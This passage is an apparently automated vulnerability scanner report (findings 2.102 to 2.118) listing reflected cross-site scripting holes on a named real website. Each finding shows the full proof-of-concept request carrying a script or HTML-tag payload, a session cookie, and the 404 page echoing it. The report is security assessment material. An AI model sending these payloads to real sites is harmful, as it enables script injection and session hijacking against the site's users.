Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86e21<script>alert(1)</script>bac0f3b21f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult86e21<script>alert(1)</script>bac0f3b21f3/media-chat/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult86e21<script>alert(1)</script>bac0f3b21f3/media-chat/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.102. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73cc3<script>alert(1)</script>2766db04561 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat73cc3<script>alert(1)</script>2766db04561/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat73cc3<script>alert(1)</script>2766db04561/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.103. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2cb4<script>alert(1)</script>7816e6101e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesc2cb4<script>alert(1)</script>7816e6101e4/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesc2cb4<script>alert(1)</script>7816e6101e4/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.104. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7ab68<script>alert(1)</script>09f33f1e474 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos7ab68<script>alert(1)</script>09f33f1e474/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos7ab68<script>alert(1)</script>09f33f1e474/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.105. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e5d7f<script>alert(1)</script>4d51883171 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagese5d7f<script>alert(1)</script>4d51883171/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagese5d7f<script>alert(1)</script>4d51883171/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.106. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 69d9e<script>alert(1)</script>04b72d9a9bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating69d9e<script>alert(1)</script>04b72d9a9bd/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating69d9e<script>alert(1)</script>04b72d9a9bd/4half.gif was not found on this server.</p>
...[SNIP]...

2.107. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 18aab<script>alert(1)</script>ad78c33097d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4half.gif18aab<script>alert(1)</script>ad78c33097d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4half.gif18aab<script>alert(1)</script>ad78c33097d was not found on this server.</p>
...[SNIP]...

2.108. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload abb67<script>alert(1)</script>7488b6d61eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4half.gif?abb67<script>alert(1)</script>7488b6d61eb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4half.gif?abb67<script>alert(1)</script>7488b6d61eb=1 was not found on this server.</p>
...[SNIP]...

2.109. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b514b<script>alert(1)</script>82e6edf5e29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultb514b<script>alert(1)</script>82e6edf5e29/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultb514b<script>alert(1)</script>82e6edf5e29/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.110. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f1a9<script>alert(1)</script>6221b70f24 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat4f1a9<script>alert(1)</script>6221b70f24/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat4f1a9<script>alert(1)</script>6221b70f24/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.111. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac2e5<script>alert(1)</script>8f6529aaa52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesac2e5<script>alert(1)</script>8f6529aaa52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesac2e5<script>alert(1)</script>8f6529aaa52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.112. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2c28f<script>alert(1)</script>ba7b9d01eb2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos2c28f<script>alert(1)</script>ba7b9d01eb2/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos2c28f<script>alert(1)</script>ba7b9d01eb2/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.113. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 25df1<script>alert(1)</script>52355aedd8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images25df1<script>alert(1)</script>52355aedd8e/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images25df1<script>alert(1)</script>52355aedd8e/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.114. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b04d1<script>alert(1)</script>c4f85c31bfa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratingb04d1<script>alert(1)</script>c4f85c31bfa/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratingb04d1<script>alert(1)</script>c4f85c31bfa/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.115. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dee62<script>alert(1)</script>4a9a296f33d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.phpdee62<script>alert(1)</script>4a9a296f33d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.phpdee62<script>alert(1)</script>4a9a296f33d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.116. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f091c<a>0a78219e80e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The response below shows the echo landing in the same unencoded 404 paragraph as the "Certain" findings for this path, so the lower confidence reflects which payload the scanner settled on for this parameter value, not a different sink; a manual retest with a script payload in Submit3 is the obvious next step.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchf091c<a>0a78219e80e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchf091c<a>0a78219e80e&opt=2 was not found on this server.</p>
...[SNIP]...

2.117. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1a664<a>299929d50a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...1a664<a>299929d50a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...1a664<a>299929d50a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.118. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ba9cc<script>alert(1)</script>31bb10db194 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba9cc<script>alert(1)</script>31bb10db194=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
